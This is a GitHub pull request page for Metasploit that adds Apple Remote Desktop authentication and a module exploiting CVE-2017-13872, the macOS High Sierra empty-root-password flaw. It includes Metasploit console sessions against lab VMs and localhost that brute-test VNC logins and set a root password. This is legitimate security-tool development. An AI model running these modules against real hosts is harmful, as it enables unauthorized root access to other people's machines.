Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Implement ARD auth and add remote CVE-2017-13872 (iamroot) module #9302

Merged
merged 4 commits into from Dec 28, 2017
Merged

Implement ARD auth and add remote CVE-2017-13872 (iamroot) module #9302

merged 4 commits into from Dec 28, 2017

Conversation

jgor
Copy link
Contributor

@jgor jgor commented Dec 14, 2017

This extends Rex::Proto::RFB to support usernames, implements authentication security type 30 ("Apple Remote Desktop" / ARD used by macOS), and uses that to add a module to remotely exploit CVE-2017-13872 over 5900/tcp on vulnerable macOS High Sierra hosts that have either Screen Sharing or Remote Management enabled.

Besides the added module for vulnerable High Sierra hosts, this lets scanner/vnc/vnc_login test credentials for any OSX host that has Screen Sharing or Remote Management enabled, and lays the groundwork for someone to add an OSX target to exploit/multi/vnc/vnc_keyboard_exec.

Verification

Note: 172.16.143.129 is a macOS High Sierra 10.13.1 vm, clean install, with System Preferences > Sharing > Screen Sharing enabled. Legitimate login is user:password.

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set RHOSTS 172.16.143.129
RHOSTS => 172.16.143.129
msf auxiliary(scanner/vnc/vnc_login) > set USERNAME user
USERNAME => user
msf auxiliary(scanner/vnc/vnc_login) > run

[*] 172.16.143.129:5900   - 172.16.143.129:5900 - Starting VNC login sweep
[+] 172.16.143.129:5900   - 172.16.143.129:5900 - Login Successful: user:password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/vnc/vnc_login) > creds
Credentials
===========

host            origin          service         public  private   realm  private_type
----            ------          -------         ------  -------   -----  ------------
172.16.143.129  172.16.143.129  5900/tcp (vnc)  user    password         Password
msf > use auxiliary/scanner/vnc/ard_root_pw
msf auxiliary(scanner/vnc/ard_root_pw) > set RHOSTS 172.16.143.129
RHOSTS => 172.16.143.129
msf auxiliary(scanner/vnc/ard_root_pw) > run

[*] 172.16.143.129:5900   - Attempting authentication as root.
[*] 172.16.143.129:5900   - Testing login as root with chosen password.
[+] 172.16.143.129:5900   - Login succeeded - root:xaavMPozB2HmDhGX
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/vnc/ard_root_pw) > creds
Credentials
===========

host            origin          service         public  private           realm  private_type
----            ------          -------         ------  -------           -----  ------------
172.16.143.129  172.16.143.129  5900/tcp (vnc)  root    xaavMPozB2HmDhGX         Password

@jgor
Copy link
Contributor Author

jgor commented Dec 18, 2017

Apologies for the previous rspec failures, this is my first experience with it. It looks correct now but let me know if I'm misunderstanding something.
Fun fact, apparently the tests behave differently between macOS and Ubuntu so I had to switch to the latter just to replicate the error Travis CI was getting. >.<

@busterb
Copy link
Contributor

busterb commented Dec 18, 2017

Thanks @jgor this looks good! The order of requires and other behaviors are often controlled by things like the order in which files are found in the filesystem, which can be OS-dependent. The system IIRC also tries to randomly order tests, which can also lead to some indeterminism.

@busterb busterb self-assigned this Dec 28, 2017
@busterb
Copy link
Contributor

busterb commented Dec 28, 2017

msf auxiliary(scanner/vnc/vnc_login) > run

[*] 127.0.0.1:5900        - 127.0.0.1:5900 - Starting VNC login sweep
[-] 127.0.0.1:5900        - 127.0.0.1:5900 - LOGIN FAILED: bcook:password (Incorrect: Authentication failed: Unknown error)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/vnc/vnc_login) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(scanner/vnc/vnc_login) > run

[*] 127.0.0.1:5900        - 127.0.0.1:5900 - Starting VNC login sweep
[+] 127.0.0.1:5900        - 127.0.0.1:5900 - Login Successful: bcook:password1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@busterb
Copy link
Contributor

busterb commented Dec 28, 2017

Looks good with test VMs

msf auxiliary(scanner/vnc/ard_root_pw) > run

[*] 127.0.0.1:5900        - Attempting authentication as root.
[*] 127.0.0.1:5900        - Testing login as root with chosen password.
[*] 127.0.0.1:5900        - Testing login as root with empty password.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@busterb busterb merged commit 09772cb into rapid7:master Dec 28, 2017
busterb added a commit that referenced this pull request Dec 28, 2017
@busterb
Copy link
Contributor

busterb commented Dec 28, 2017

Great work @jgor! I'm going to writeup some docs for these based on notes from testing and push them in next.

@busterb
Copy link
Contributor

busterb commented Dec 28, 2017

Release Notes

This extends Rex::Proto::RFB to support usernames, implements authentication security type 30 ("Apple Remote Desktop" / ARD used by macOS), and uses that to add a module to remotely exploit CVE-2017-13872 over 5900/tcp on vulnerable macOS High Sierra hosts that have either Screen Sharing or Remote Management enabled.

Besides the added module for vulnerable High Sierra hosts, this also lets scanner/vnc/vnc_login test credentials for any OSX host that has Screen Sharing or Remote Management enabled, and lays the groundwork for someone to add an OSX target to exploit/multi/vnc/vnc_keyboard_exec.

@busterb
Copy link
Contributor

busterb commented Dec 28, 2017

5e71be7 for module docs

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants